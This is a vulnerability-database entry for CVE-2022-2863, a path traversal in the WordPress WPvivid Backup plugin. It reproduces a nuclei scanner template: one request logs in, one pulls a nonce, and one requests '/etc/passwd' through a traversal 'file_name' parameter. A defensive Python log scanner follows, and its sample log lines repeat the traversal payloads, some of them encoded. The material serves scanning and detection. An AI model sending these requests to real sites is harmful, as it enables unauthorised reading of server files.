NUCLEI:CVE-2022-2863 (nuclei, ProjectDiscovery)
Oct 19, 2022 - 8:26 a.m.

WordPress WPvivid Backup <0.9.76 - Local File Inclusion

2022-10-19 08:26:08
ProjectDiscovery
github.com
Tags: wordpress, wpvivid, backup, vulnerability, local file inclusion, cve-2022-2863, wpscan, seclists, packetstorm, authenticated

CVSS3: 4.9 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.352 Low
Percentile: 97.2%

WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high-privilege users to read any file from the web server.

id: CVE-2022-2863

info:
  name: WordPress WPvivid Backup <0.9.76 - Local File Inclusion
  author: tehtbl
  severity: medium
  description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.
  remediation: Upgrade to version 0.9.76 or later.
  reference:
    - https://seclists.org/fulldisclosure/2022/Oct/0
    - https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5
    - http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2863
    - https://github.com/rodnt/rodnt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2022-2863
    cwe-id: CWE-22
    epss-score: 0.46632
    epss-percentile: 0.97438
    cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: wpvivid
    product: migration\,_backup\,_staging
    framework: wordpress
  tags: cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=WPvivid HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"_ajax_nonce":"([0-9a-z]+)"'
        internal: true
        part: body
# digest: 4a0a0047304502202b24f378b2c15e4a80c536ce9df05a94c3cabe81bb8e1eb19e344fcff19b3953022100f8e4e6c2e550b6fc7afb7c79ceae5d335310de4900ce7b2fb357c5ea265a0c6f:922c64590222798bb761d5b6d8e72950
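
A defender-side check for the request shape the template sends, added here as an example (it is not part of the nuclei template or the plugin's code): it scans web server access logs for `wpvivid_download_export_backup` calls whose `file_name` decodes to a traversal or absolute path. The combined log format, the backup file name and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [19/Oct/2022:08:26:08 +0000] "GET /wp-admin/admin-ajax.php?_wpnonce=0a1b2c3d4e&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1" 200 1843
198.51.100.20 - - [19/Oct/2022:08:30:11 +0000] "GET /wp-admin/admin-ajax.php?_wpnonce=9f8e7d6c5b&action=wpvivid_download_export_backup&file_name=wpvivid-5f3a_2022-10-19-08-00_export_post.zip&file_size=20480 HTTP/1.1" 200 20480
203.0.113.7 - - [19/Oct/2022:08:31:02 +0000] "GET /wp-admin/admin-ajax.php?_wpnonce=0a1b2c3d4e&action=wpvivid_download_export_backup&file_name=..%2f..%2f..%2fetc%2fpasswd&file_size=922 HTTP/1.1" 200 1843
192.0.2.55 - - [19/Oct/2022:08:40:45 +0000] "GET /wp-admin/admin-ajax.php?_wpnonce=1122334455&action=wpvivid_download_export_backup&file_name=%252e%252e%252f%252e%252e%252fetc%252fpasswd&file_size=922 HTTP/1.1" 403 312
198.51.100.20 - - [19/Oct/2022:08:41:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58
"""

# client IP, timestamp, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so nested encodings such as %252e are unwrapped."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious_file_name(name):
    """True if the name is an absolute path or contains a '..' path segment."""
    name = decode_fully(name).replace("\\", "/")
    return (name.startswith("/") or ".." in name.split("/")
            or re.match(r"^[A-Za-z]:", name) is not None)

def find_traversal_attempts(log_text):
    """Return one record per export-download request with a suspicious file_name."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # decodes once
        if "wpvivid_download_export_backup" not in params.get("action", []):
            continue
        for name in params.get("file_name", []):
            if is_suspicious_file_name(name):
                hits.append({"ip": ip, "time": ts, "status": int(status),
                             "file_name": decode_fully(name)})
    return hits
```

A hit with status 200 deserves priority during triage, since the template's own matcher treats a 200 response containing file content as confirmation of the read.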
